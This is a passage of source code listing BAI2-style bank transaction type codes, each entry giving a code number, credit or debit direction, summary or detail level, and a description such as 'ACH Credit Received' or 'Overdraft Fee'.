TypeCode('136', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in DTC Deposit'),
TypeCode('140', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ACH Credits'),
TypeCode('142', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Credit Received'),
TypeCode('143', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in ACH Deposit'),
TypeCode('145', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Concentration Credit'),
TypeCode('146', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Bank Card Deposits'),
TypeCode('147', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Bank Card Deposit'),
TypeCode('150', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Preauthorized Payment Credits'),
TypeCode('155', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Preauthorized Draft Credit'),
TypeCode('156', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in PAC Deposit'),
TypeCode('159', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Real Time Payment (RTP) Credit Total'),
TypeCode('160', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ACH Disbursing Funding Credits'),
TypeCode('162', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Corporate Trade Payment Settlement'),
TypeCode('163', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Corporate Trade Payment Credits'),
TypeCode('164', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Corporate Trade Payment Credit'),
TypeCode('165', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Preauthorized ACH Credit'),
TypeCode('166', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Settlement'),
TypeCode('167', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'ACH Settlement Credits'),
TypeCode('168', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'ACH Return Item or Adjustment Settlement'),
TypeCode('169', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Miscellaneous ACH Credit'),
TypeCode('170', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Other Check Deposits'),
TypeCode('171', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Loan Deposit'),
TypeCode('172', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Deposit Correction'),
TypeCode('173', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Bank-Prepared Deposit'),
TypeCode('174', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Other Deposit'),
TypeCode('175', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Check Deposit Package'),
TypeCode('176', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Re-presented Check Deposit'),
TypeCode('178', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'List Post Credits'),
TypeCode('180', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Loan Proceeds'),
TypeCode('182', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Bank-Prepared Deposits'),
TypeCode('184', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Draft Deposit'),
TypeCode('185', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Deposits'),
TypeCode('186', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Cash Letter Credits'),
TypeCode('187', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cash Letter Credit'),
TypeCode('188', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Cash Letter Adjustments'),
TypeCode('189', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cash Letter Adjustment'),
TypeCode('190', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Incoming Money Transfers'),
TypeCode('191', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Incoming Internal Money Transfer'),
TypeCode('195', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Incoming Money Transfer'),
TypeCode('196', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Money Transfer Adjustment'),
TypeCode('198', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Compensation'),
TypeCode('200', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Automatic Transfer Credits'),
TypeCode('201', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Automatic Transfer Credit'),
TypeCode('202', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Bond Operations Credit'),
TypeCode('205', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Book Transfer Credits'),
TypeCode('206', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Book Transfer Credit'),
TypeCode('207', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Money Transfer Credits'),
TypeCode('208', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual International Money Transfer Credit'),
TypeCode('210', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Credits'),
TypeCode('212', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Letter of Credit'),
TypeCode('213', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Letter of Credit'),
TypeCode('214', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Exchange of Credit'),
TypeCode('215', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Letters of Credit'),
TypeCode('216', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Remittance Credit'),
TypeCode('218', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Collection Credit'),
TypeCode('221', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Check Purchase'),
TypeCode('222', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Foreign Checks Deposited'),
TypeCode('224', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Commission'),
TypeCode('226', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'International Money Market Trading'),
TypeCode('227', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Standing Order'),
TypeCode('229', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous International Credit'),
TypeCode('230', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Security Credits'),
TypeCode('231', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Collection Credits'),
TypeCode('232', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sale of Debt Security'),
TypeCode('233', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Securities Sold'),
TypeCode('234', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sale of Equity Security'),
TypeCode('235', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Matured Reverse Repurchase Order'),
TypeCode('236', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Maturity of Debt Security'),
TypeCode('237', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Collection Credit'),
TypeCode('238', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Collection of Dividends'),
TypeCode('239', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Bankers’ Acceptance Credits'),
TypeCode('240', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Coupon Collections – Banks'),
TypeCode('241', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Bankers’ Acceptances'),
TypeCode('242', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Collection of Interest Income'),
TypeCode('243', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Matured Fed Funds Purchased'),
TypeCode('244', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Interest/Matured Principal Payment'),
TypeCode('245', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Monthly Dividends'),
TypeCode('246', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Commercial Paper'),
TypeCode('247', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Capital Change'),
TypeCode('248', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Savings Bonds Sales Adjustment'),
TypeCode('249', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous Security Credit'),
TypeCode('250', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Checks Posted and Returned'),
TypeCode('251', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Debit Reversals'),
TypeCode('252', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Debit Reversal'),
TypeCode('254', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Posting Error Correction Credit'),
TypeCode('255', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Check Posted and Returned'),
TypeCode('256', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ACH Return Items'),
TypeCode('257', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual ACH Return Item'),
TypeCode('258', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ACH Reversal Credit'),
TypeCode('260', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Rejected Credits'),
TypeCode('261', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Rejected Credit'),
TypeCode('263', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Overdraft'),
TypeCode('266', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Return Item'),
TypeCode('268', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Return Item Adjustment'),
TypeCode('270', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ZBA Credits'),
TypeCode('271', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Net Zero-Balance Amount'),
TypeCode('274', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cumulative** ZBA or Disbursement Credits'),
TypeCode('275', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Credit'),
TypeCode('276', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Float Adjustment'),
TypeCode('277', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Credit Transfer'),
TypeCode('278', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ZBA Credit Adjustment'),
TypeCode('280', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Controlled Disbursing Credits'),
TypeCode('281', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Controlled Disbursing Credit'),
TypeCode('285', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total DTC Disbursing Credits'),
TypeCode('286', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual DTC Disbursing Credit'),
TypeCode('294', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total ATM Credits'),
TypeCode('295', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'ATM Credit'),
TypeCode('301', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Commercial Deposit'),
TypeCode('302', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Correspondent Bank Deposit'),
TypeCode('303', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Wire Transfers In – FF'),
TypeCode('304', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Wire Transfers In – CHF'),
TypeCode('305', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Fed Funds Sold'),
TypeCode('306', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Fed Funds Sold'),
TypeCode('307', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Trust Credits'),
TypeCode('308', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Trust Credit'),
TypeCode('309', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Value - Dated Funds'),
TypeCode('310', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Commercial Deposits'),
TypeCode('315', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Credits – FF'),
TypeCode('316', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total International Credits – CHF'),
TypeCode('318', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Foreign Check Purchased'),
TypeCode('319', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Late Deposit'),
TypeCode('320', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Sold – FF'),
TypeCode('321', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Sold – CHF'),
TypeCode('324', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Matured – FF'),
TypeCode('325', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Matured – CHF'),
TypeCode('326', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Interest'),
TypeCode('327', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Matured'),
TypeCode('328', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Interest – FF'),
TypeCode('329', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Interest – CHF'),
TypeCode('330', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Escrow Credits'),
TypeCode('331', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Escrow Credit'),
TypeCode('332', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Securities Credits – FF'),
TypeCode('336', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Securities Credits – CHF'),
TypeCode('338', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Securities Sold'),
TypeCode('340', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Broker Deposits'),
TypeCode('341', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Broker Deposits – FF'),
TypeCode('342', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Broker Deposit'),
TypeCode('343', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Broker Deposits – CHF'),
TypeCode('344', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Back Value Credit'),
TypeCode('345', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Item in Brokers Deposit'),
TypeCode('346', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sweep Interest Income'),
TypeCode('347', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Sweep Principal Sell'),
TypeCode('348', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Futures Credit'),
TypeCode('349', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Principal Payments Credit'),
TypeCode('350', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Investment Sold'),
TypeCode('351', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Individual Investment Sold'),
TypeCode('352', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Cash Center Credits'),
TypeCode('353', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cash Center Credit'),
TypeCode('354', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Interest Credit'),
TypeCode('355', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Investment Interest'),
TypeCode('356', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credit Adjustment'),
TypeCode('357', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Credit Adjustment'),
TypeCode('358', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'YTD Adjustment Credit'),
TypeCode('359', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Interest Adjustment Credit'),
TypeCode('360', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Credits Less Wire Transfer and '
'Returned Checks'),
TypeCode('361', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Grand Total Credits Less Grand Total Debits'),
TypeCode('362', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Correspondent Collection'),
TypeCode('363', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Correspondent Collection Adjustment'),
TypeCode('364', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Loan Participation'),
TypeCode('366', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Currency and Coin Deposited'),
TypeCode('367', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Food Stamp Letter'),
TypeCode('368', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Food Stamp Adjustment'),
TypeCode('369', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Clearing Settlement Credit'),
TypeCode('370', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Back Value Credits'),
TypeCode('372', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Back Value Adjustment'),
TypeCode('373', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Customer Payroll'),
TypeCode('374', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Statement Recap'),
TypeCode('376', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Savings Bond Letter or Adjustment'),
TypeCode('377', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Treasury Tax and Loan Credit'),
TypeCode('378', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Transfer of Treasury Credit'),
TypeCode('379', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Government Checks Cash Letter Credit'),
TypeCode('381', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Government Check Adjustment'),
TypeCode('382', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Postal Money Order Credit'),
TypeCode('383', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Postal Money Order Adjustment'),
TypeCode('384', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Credit'),
TypeCode('385', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Universal Credits'),
TypeCode('386', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Cash Letter Auto Charge Adjustment'),
TypeCode('387', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Fine-Sort Cash Letter Credit'),
TypeCode('388', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'FRB Fine-Sort Adjustment'),
TypeCode('389', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Freight Payment Credits'),
TypeCode('390', TypeCodeTransaction.credit, TypeCodeLevel.summary, 'Total Miscellaneous Credits'),
TypeCode('391', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Universal Credit'),
TypeCode('392', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Freight Payment Credit'),
TypeCode('393', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Itemized Credit Over $10,000'),
TypeCode('394', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Cumulative** Credits'),
TypeCode('395', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Check Reversal'),
TypeCode('397', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Float Adjustment'),
TypeCode('398', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous Fee Refund'),
TypeCode('399', TypeCodeTransaction.credit, TypeCodeLevel.detail, 'Miscellaneous Credit'),
TypeCode('400', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debits'),
TypeCode('401', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debit Amount MTD'),
TypeCode('402', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Number of Debits'),
TypeCode('403', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Today’s Total Debits'),
TypeCode('405', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debit Less Wire Transfers and '
'ChargeBacks'),
TypeCode('406', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Debits not Detailed'),
TypeCode('408', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Float Adjustment'),
TypeCode('409', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Debit (Any Type)'),
TypeCode('410', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total YTD Adjustment'),
TypeCode('412', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Debits (Excluding Returned Items)'),
TypeCode('415', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Lockbox Debit'),
TypeCode('416', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Lockbox Debits'),
TypeCode('420', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'EDI Transaction Debits'),
TypeCode('421', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'EDI Transaction Debit'),
TypeCode('422', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'EDIBANX Settlement Debit'),
TypeCode('423', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'EDIBANX Return Item Debit'),
TypeCode('430', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Payable–Through Drafts'),
TypeCode('435', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Payable–Through Draft'),
TypeCode('445', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Concentration Debit'),
TypeCode('446', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ACH Disbursement Funding Debits'),
TypeCode('447', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Disbursement Funding Debit'),
TypeCode('450', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ACH Debits'),
TypeCode('451', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Debit Received'),
TypeCode('452', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Item in ACH Disbursement or Debit'),
TypeCode('455', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Preauthorized ACH Debit'),
TypeCode('459', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Real Time Payment (RTP) Debit Total'),
TypeCode('462', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Account Holder Initiated ACH Debit'),
TypeCode('463', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Corporate Trade Payment Debits'),
TypeCode('464', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Corporate Trade Payment Debit'),
TypeCode('465', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Corporate Trade Payment Settlement'),
TypeCode('466', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Settlement'),
TypeCode('467', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'ACH Settlement Debits'),
TypeCode('468', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Return Item or Adjustment Settlement'),
TypeCode('469', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous ACH Debit'),
TypeCode('470', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Check Paid'),
TypeCode('471', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Check Paid – Cumulative MTD'),
TypeCode('472', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cumulative** Checks Paid'),
TypeCode('474', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Certified Check Debit'),
TypeCode('475', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Check Paid'),
TypeCode('476', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Federal Reserve Bank Letter Debit'),
TypeCode('477', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Bank Originated Debit'),
TypeCode('478', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'List Post Debits'),
TypeCode('479', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'List Post Debit'),
TypeCode('480', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Loan Payments'),
TypeCode('481', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Loan Payment'),
TypeCode('482', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Bank-Originated Debits'),
TypeCode('484', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Draft'),
TypeCode('485', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'DTC Debit'),
TypeCode('486', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Cash Letter Debits'),
TypeCode('487', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cash Letter Debit'),
TypeCode('489', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Cash Letter Adjustment'),
TypeCode('490', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Outgoing Money Transfers'),
TypeCode('491', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Outgoing Internal Money Transfer'),
TypeCode('493', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Customer Terminal Initiated Money Transfer'),
TypeCode('495', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Outgoing Money Transfer'),
TypeCode('496', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Money Transfer Adjustment'),
TypeCode('498', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Compensation'),
TypeCode('500', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Automatic Transfer Debits'),
TypeCode('501', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Automatic Transfer Debit'),
TypeCode('502', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Bond Operations Debit'),
TypeCode('505', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Book Transfer Debits'),
TypeCode('506', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Book Transfer Debit'),
TypeCode('507', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Money Transfer Debits'),
TypeCode('508', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual International Money Transfer Debits'),
TypeCode('510', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total International Debits'),
TypeCode('512', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Letter of Credit Debit'),
TypeCode('513', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Letter of Credit'),
TypeCode('514', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Exchange Debit'),
TypeCode('515', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Letters of Credit'),
TypeCode('516', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Remittance Debit'),
TypeCode('518', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Collection Debit'),
TypeCode('522', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Foreign Checks Paid'),
TypeCode('524', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Commission'),
TypeCode('526', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'International Money Market Trading'),
TypeCode('527', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Standing Order'),
TypeCode('529', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous International Debit'),
TypeCode('530', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Security Debits'),
TypeCode('531', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Securities Purchased'),
TypeCode('532', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Amount of Securities Purchased'),
TypeCode('533', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Security Collection Debit'),
TypeCode('534', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Miscellaneous Securities DB – FF'),
TypeCode('535', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Purchase of Equity Securities'),
TypeCode('536', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Miscellaneous Securities Debit – CHF'),
TypeCode('537', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Collection Debit'),
TypeCode('538', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Matured Repurchase Order'),
TypeCode('539', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Bankers’ Acceptances Debit'),
TypeCode('540', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Coupon Collection Debit'),
TypeCode('541', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Bankers’ Acceptances'),
TypeCode('542', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Purchase of Debt Securities'),
TypeCode('543', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Domestic Collection'),
TypeCode('544', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Interest/Matured Principal Payment'),
TypeCode('546', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Commercial paper'),
TypeCode('547', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Capital Change'),
TypeCode('548', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Savings Bonds Sales Adjustment'),
TypeCode('549', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Miscellaneous Security Debit'),
TypeCode('550', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Deposited Items Returned'),
TypeCode('551', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Credit Reversals'),
TypeCode('552', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Credit Reversal'),
TypeCode('554', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Posting Error Correction Debit'),
TypeCode('555', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Deposited Item Returned'),
TypeCode('556', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total ACH Return Items'),
TypeCode('557', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual ACH Return Item'),
TypeCode('558', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'ACH Reversal Debit'),
TypeCode('560', TypeCodeTransaction.debit, TypeCodeLevel.summary, 'Total Rejected Debits'),
TypeCode('561', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Individual Rejected Debit'),
TypeCode('563', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Overdraft'),
TypeCode('564', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Overdraft Fee'),
TypeCode('566', TypeCodeTransaction.debit, TypeCodeLevel.detail, 'Return Item'),
